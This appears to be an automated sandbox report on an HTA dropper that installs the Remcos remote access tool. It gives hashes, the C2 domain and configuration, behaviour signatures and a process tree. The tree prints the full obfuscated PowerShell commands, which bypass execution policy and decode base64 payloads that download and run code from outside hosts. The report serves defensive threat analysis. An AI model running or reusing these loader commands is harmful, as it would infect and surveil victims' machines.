Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-12-2024 06:24

General

  • Target

    seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta

  • Size

    144KB

  • MD5

    80636733be5c6936770df78c2298d639

  • SHA1

    0e9cd08975bff8b04e8e7671f13c2585c25796a5

  • SHA256

    9c4e6335372584e7b1e145fe9ac1eeb43c148ac9b98337a4629b817badc83eec

  • SHA512

    6518d2d47c9f724e9beeae9440ac82d379d51e8bd81970fe37b933f07e2ebe7e280c91c30202cf4c57776551ff2524d78bceb486a74a100472838d96500fa1a7

  • SSDEEP

    768:t1EuT0um2oum2uD5KUJDVUKhCTGVf/ACBzg2lw1/lEwUUKBqe/zg7szgmUM/ONvT:tF

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

kiolokgangan.duckdns.org:2430

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-H22KKM

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1280
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5076
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcikuhda\gcikuhda.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4132
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB41.tmp" "c:\Users\Admin\AppData\Local\Temp\gcikuhda\CSC20A79535F27C40D8A1574A457D2C935D.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2972
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:212
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1936
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    19KB

    MD5

    3152b64791a49d9c82b1d34a70fda147

    SHA1

    7a03bd5ebb0a290f7ad005cbb6d75503ccc9b3d2

    SHA256

    d6bbe8cb5b838084fba86fbdb5be09ed5768bf3284ddd952c9e610d7cdb89901

    SHA512

    e7a43e9eceb75772220cba016fb83064b1c4b2a5d0196cca89d771a2336056f341c17a4712c51045df73b416ec7e7736f84b2da483e7a75586514abb2548da50

  • C:\Users\Admin\AppData\Local\Temp\RESBB41.tmp

    Filesize

    1KB

    MD5

    6bed9628d6a403d5a429d2b8d3849c6a

    SHA1

    77d4ce2e9b830e103f194e7549298b8162078c11

    SHA256

    83f8597ad63766a962fa0fc1c7e1d4ff6034df8c052746206102662a8989b646

    SHA512

    3918024f280c03fc700c9a5b0d835ad8cbd1686cb41c75d902e3d1866c74e9ff4d4dc6e05c622bc9d349284ba146fd3d2f63e88a7ca8746923478c14e056fa52

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kunk50iw.4qu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\gcikuhda\gcikuhda.dll

    Filesize

    3KB

    MD5

    11cb3251822ea58e7b33866ccdf5a13f

    SHA1

    ded8fd97616673520bc5034d9744d02452277eb8

    SHA256

    138b0fb0500e7462c82d98f2b377877c53e7c10cac33ae3aaffe291f1fefbd4d

    SHA512

    6588dd43e49afa911f51e9760a8f207ea2f32ee8edc8e441895d5e811bbb90970e1254e903381c9ec8ab0cf3b16be2c77804fddb377001497ea33b0e57b605ba

  • C:\Users\Admin\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS

    Filesize

    150KB

    MD5

    80c468cccbc1d6aa31d066f64ce06b42

    SHA1

    6276da318e9ec1756dda7d7c9e9b2c5f00d3fda4

    SHA256

    79a186bd409caf82e85361c6885fd71ee00bea6968d85cb8c9b71535909fe411

    SHA512

    37fd56e6121926e15433636afe449f7002de7a5be35c18f8855d2e24c3542eabd7533b2ddb363e49972ddca03f3edb5868bb944ac799ff2fcf245d6271bf6662

  • \??\c:\Users\Admin\AppData\Local\Temp\gcikuhda\CSC20A79535F27C40D8A1574A457D2C935D.TMP

    Filesize

    652B

    MD5

    25a7416cdd1eebb32efa54757fcf5c25

    SHA1

    e28b993f68e52ec949bb6f67b8a985c7c39ad446

    SHA256

    3cc2493ab60fb4baa9c774486d65f646d24c3d7dbe6ad51b3ce084783e2a3958

    SHA512

    3bfb508dd45b29c7ffab9ee1783d0381372596861ea49db87212c02c08b09928a9da1692cfa094fc46cc2a49e420c0fab18d877c44d0558f617cf924d57b8a8a

  • \??\c:\Users\Admin\AppData\Local\Temp\gcikuhda\gcikuhda.0.cs

    Filesize

    485B

    MD5

    c0ab7d9c1b9063dc8a229d9074412ec6

    SHA1

    4822b8b99901c563e7b2eb0399aab1ada29809d1

    SHA256

    05da06f5d5afbb950c215d14a1ae166c256466f43298bf300ddffe6cf87d6ef6

    SHA512

    3d09208b03cbbca2f036d4c7caf06990af60c40fd3727f59489c454e7d8d02a6f0ed1448040f224a093695dd143836044d5afdd8543c921a2f543246da57b4bf

  • \??\c:\Users\Admin\AppData\Local\Temp\gcikuhda\gcikuhda.cmdline

    Filesize

    369B

    MD5

    2a4a1bbae7a1bc204b148019ad5b4b7e

    SHA1

    57e82d5df2963b24bfefa52d40a7aed2a0e0e1d8

    SHA256

    7c5f5a971d447ae619830e5b8ed4e750294384e6ab4edb94ec7f8c3686f41479

    SHA512

    647d3162d7d03173a48f9d137be259ce8b66b3b41ef4184ca35eb4e7e629308fd0299e0bfee5b9fa84bf03d4956cd356b5feaa768cc446f757352c408f02015b

  • memory/1796-120-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-119-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-148-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-147-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-146-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-145-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-144-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-143-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-99-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-142-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-141-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-100-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-140-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-139-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-138-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-137-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-136-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-135-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-134-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-133-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-132-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-131-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-130-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-129-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-128-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-127-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-126-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-125-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-124-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-123-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-117-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-122-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-116-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-115-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-84-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-85-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-86-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-88-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-89-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-90-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-91-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-92-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-93-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-94-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-95-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-96-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-97-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-98-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-121-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-118-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-101-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-102-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-103-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-104-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-105-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-106-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-107-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-108-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-109-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-110-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-111-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-112-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-113-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1796-114-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1936-83-0x0000000019050000-0x00000000190EC000-memory.dmp

    Filesize

    624KB

  • memory/1936-82-0x00000000077A0000-0x0000000007924000-memory.dmp

    Filesize

    1.5MB

  • memory/1936-76-0x0000000005A20000-0x0000000005D74000-memory.dmp

    Filesize

    3.3MB

  • memory/5076-63-0x000000007115E000-0x000000007115F000-memory.dmp

    Filesize

    4KB

  • memory/5076-37-0x0000000006E80000-0x0000000006E9A000-memory.dmp

    Filesize

    104KB

  • memory/5076-0-0x000000007115E000-0x000000007115F000-memory.dmp

    Filesize

    4KB

  • memory/5076-34-0x0000000071150000-0x0000000071900000-memory.dmp

    Filesize

    7.7MB

  • memory/5076-1-0x00000000021B0000-0x00000000021E6000-memory.dmp

    Filesize

    216KB

  • memory/5076-2-0x0000000071150000-0x0000000071900000-memory.dmp

    Filesize

    7.7MB

  • memory/5076-69-0x0000000071150000-0x0000000071900000-memory.dmp

    Filesize

    7.7MB

  • memory/5076-3-0x0000000004CC0000-0x00000000052E8000-memory.dmp

    Filesize

    6.2MB

  • memory/5076-64-0x0000000071150000-0x0000000071900000-memory.dmp

    Filesize

    7.7MB

  • memory/5076-17-0x0000000005B10000-0x0000000005B2E000-memory.dmp

    Filesize

    120KB

  • memory/5076-57-0x00000000070D0000-0x00000000070D8000-memory.dmp

    Filesize

    32KB

  • memory/5076-4-0x0000000004B50000-0x0000000004B72000-memory.dmp

    Filesize

    136KB

  • memory/5076-5-0x0000000005420000-0x0000000005486000-memory.dmp

    Filesize

    408KB

  • memory/5076-6-0x0000000005490000-0x00000000054F6000-memory.dmp

    Filesize

    408KB

  • memory/5076-16-0x0000000005570000-0x00000000058C4000-memory.dmp

    Filesize

    3.3MB

  • memory/5076-18-0x0000000005BC0000-0x0000000005C0C000-memory.dmp

    Filesize

    304KB

  • memory/5076-44-0x00000000070D0000-0x00000000070D8000-memory.dmp

    Filesize

    32KB

  • memory/5076-43-0x00000000070E0000-0x00000000070FA000-memory.dmp

    Filesize

    104KB

  • memory/5076-42-0x00000000070A0000-0x00000000070B4000-memory.dmp

    Filesize

    80KB

  • memory/5076-41-0x0000000007090000-0x000000000709E000-memory.dmp

    Filesize

    56KB

  • memory/5076-40-0x0000000007060000-0x0000000007071000-memory.dmp

    Filesize

    68KB

  • memory/5076-39-0x0000000007100000-0x0000000007196000-memory.dmp

    Filesize

    600KB

  • memory/5076-38-0x0000000006EE0000-0x0000000006EEA000-memory.dmp

    Filesize

    40KB

  • memory/5076-36-0x0000000071150000-0x0000000071900000-memory.dmp

    Filesize

    7.7MB

  • memory/5076-35-0x0000000007500000-0x0000000007B7A000-memory.dmp

    Filesize

    6.5MB

  • memory/5076-19-0x0000000006AE0000-0x0000000006B12000-memory.dmp

    Filesize

    200KB

  • memory/5076-33-0x0000000006DD0000-0x0000000006E73000-memory.dmp

    Filesize

    652KB

  • memory/5076-32-0x0000000006110000-0x000000000612E000-memory.dmp

    Filesize

    120KB

  • memory/5076-21-0x000000006DB80000-0x000000006DED4000-memory.dmp

    Filesize

    3.3MB

  • memory/5076-27-0x0000000071150000-0x0000000071900000-memory.dmp

    Filesize

    7.7MB

  • memory/5076-20-0x000000006DA10000-0x000000006DA5C000-memory.dmp

    Filesize

    304KB